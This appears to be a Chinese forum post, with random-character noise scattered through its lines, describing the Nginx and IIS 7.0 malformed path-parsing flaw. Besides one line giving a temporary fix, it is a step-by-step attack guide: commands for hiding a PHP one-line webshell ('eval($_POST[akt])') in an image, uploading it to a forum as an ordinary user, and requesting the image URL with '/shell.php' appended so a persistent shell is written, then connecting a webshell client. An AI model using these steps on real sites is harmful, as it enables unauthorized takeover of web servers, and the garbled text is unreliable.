IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 % z* s: e" w9 \0 a+ l( ?: b4 X* I
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
. O( q2 f4 ^* \$ F u__________________________________ * h$ l0 d$ K$ w- z. Q. k
1 z. e- n$ B9 q% x" l: P+ j- t/ H
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) ' H) t8 D3 t% @2 D% L7 Z- b
先合并一张PHP一句话图片马,合并方法: . @% d% r8 X' m/ G4 Q7 U7 R
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif - \) y& D3 O( q7 F$ p2 v/ r
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
4 g/ y5 {4 F; f' c图片随便找一张.
2 A( R* n0 m) K% `- J- b+ Q6 A, g0 `一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
% \. y& b) f7 {然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
+ ?6 X7 R3 ]$ P找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 ( x2 q& P4 V2 t. i
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
6 j; K( \4 F) j. x则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php+ i* s, E7 }* l) Z
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 2 j; ]) \; O c4 _+ _6 o, E
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
1 a$ @; e1 a9 ?& I; V上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
V2 ?9 q, U9 G1 S; _( k找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
$ k0 \5 u# w# f8 ]在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 : h6 b( K4 m* X# K
剩下的就随便你去搞吧。
6 G* ~4 A L2 T- I, i9 a
$ j! @. F% G. }( Y% U+ |; G1 a |